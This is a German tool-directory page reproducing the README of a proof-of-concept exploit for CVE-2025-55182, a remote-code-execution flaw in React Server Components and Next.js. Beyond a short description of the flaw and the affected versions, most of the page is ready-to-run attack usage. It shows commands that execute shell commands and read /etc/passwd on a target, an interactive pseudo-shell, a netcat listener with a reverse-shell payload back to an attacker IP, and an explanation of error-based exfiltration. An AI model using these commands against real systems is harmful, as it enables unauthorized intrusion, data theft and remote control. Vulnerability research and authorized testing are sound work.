Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
react2shell-poc — CVE-2025-55182 React2Shell PoC – Kritische RCE in React Server Components / Next.js. CVSS 10.0. Fehlerbasierte Exfiltration, Reverse Shell, interaktiver Modus. | Kitploit
Tools/GitHubGitHub/p3ta00/react2shell-poc
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlLernen & BildungRemote-Access-Tool
GitHubp3ta00/react2shell-poc

react2shell-poc

CVE-2025-55182 React2Shell PoC – Kritische RCE in React Server Components / Next.js. CVSS 10.0. Fehlerbasierte Exfiltration, Reverse Shell, interaktiver Modus.

9110vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
Teilen

React2Shell - CVE-2025-55182 PoC

Proof of Concept für CVE-2025-55182, eine kritische nicht authentifizierte Remote-Code-Ausführungsschwachstelle in React Server Components.

CVSS-Score: 10.0 (Kritisch)

Schwachstelle

Die Schwachstelle existiert im Flight-Protokoll-Deserialisierer von React. Durch Ausnutzung von Prototype-Pollution mittels speziell gestalteter Payloads kann ein Angreifer eine beliebige Codeausführung auf verwundbaren Next.js-Anwendungen erreichen.

Betroffene Versionen

ProduktVerwundbarGepatched
React19.0.0 - 19.2.019.0.1, 19.1.2, 19.2.1+
Next.js14.3.0-canary.77 - 16.x15.0.5, 15.1.9, 15.2.6, 16.0.7+

Installation

git clone https://github.com/p3ta00/react2shell-poc.git
cd react2shell-poc
pip install requests

Verwendung

Befehlsausführung mit Ausgabe (Standard – Fehlerbasierte Exfiltration)

Die Ausgabe wird direkt in der HTTP-Antwort über den NEXT_REDIRECT-Fehler zurückgegeben – kein Callback-Server erforderlich.

python3 react2shell-poc.py -t http://TARGET:3000 -c "id"
python3 react2shell-poc.py -t http://TARGET:3000 -c "cat /etc/passwd"

Interaktiver Modus

python3 react2shell-poc.py -t http://TARGET:3000 -i

Schwachstelle prüfen

python3 react2shell-poc.py -t http://TARGET:3000 --check

Blind RCE (Keine Ausgabe)

python3 react2shell-poc.py -t http://TARGET:3000 -c "touch /tmp/pwned" --blind

Reverse Shell

# Listener starten
nc -lvnp 4444

# Payload senden
python3 react2shell-poc.py -t http://TARGET:3000 --revshell --lhost YOUR_IP --lport 4444

Legacy: Callback-basierte Exfiltration

python3 react2shell-poc.py -t http://TARGET:3000 -c "id" --listen --lhost YOUR_IP

Optionen

-t, --target       Ziel-URL (erforderlich)
-c, --command      Auszuführender Befehl (Ausgabe standardmäßig über fehlerbasierte Exfiltration)
--check            Prüfen, ob das Ziel verwundbar ist
--blind            Blind-RCE-Modus (keine Ausgabeerfassung)
--listen           Callback-Server anstelle der fehlerbasierten Exfiltration verwenden
-i, --interactive  Interaktiver Pseudo-Shell-Modus
--revshell         Reverse Shell versuchen
--lhost            Angreifer-IP für Callbacks/Reverse Shell
--lport            Callback-Port (Standard: 9999)
--callback         Manuelle Callback-URL
--timeout          Request-Timeout in Sekunden (Standard: 30)

Funktionsweise

Die standardmäßige Exfiltrationsmethode verwendet die NEXT_REDIRECT-Fehlerinjektion:

  1. Befehl ausführen und Ausgabe erfassen
  2. Einen NEXT_REDIRECT-Fehler mit der Ausgabe im digest-Feld auslösen
  3. Next.js serialisiert den Fehler in der Flight-Antwort
  4. Die Ausgabe erscheint direkt im HTTP-Antworttext

Dies ist zuverlässiger als die callback-basierte Exfiltration, da hierfür kein ausgehender Netzwerkzugriff vom Ziel aus erforderlich ist.

Referenzen

  • Wiz Security - React2Shell Disclosure
  • Datadog Security Labs Analysis
  • NVD - CVE-2025-55182

Haftungsausschluss

Dieses Tool ist ausschließlich für autorisierte Sicherheitstests und zu Bildungszwecken bestimmt. Unbefugter Zugriff auf Computersysteme ist illegal. Holen Sie vor dem Testen stets eine ordnungsgemäße Autorisierung ein.

Autor

p3ta

Tool herunterladen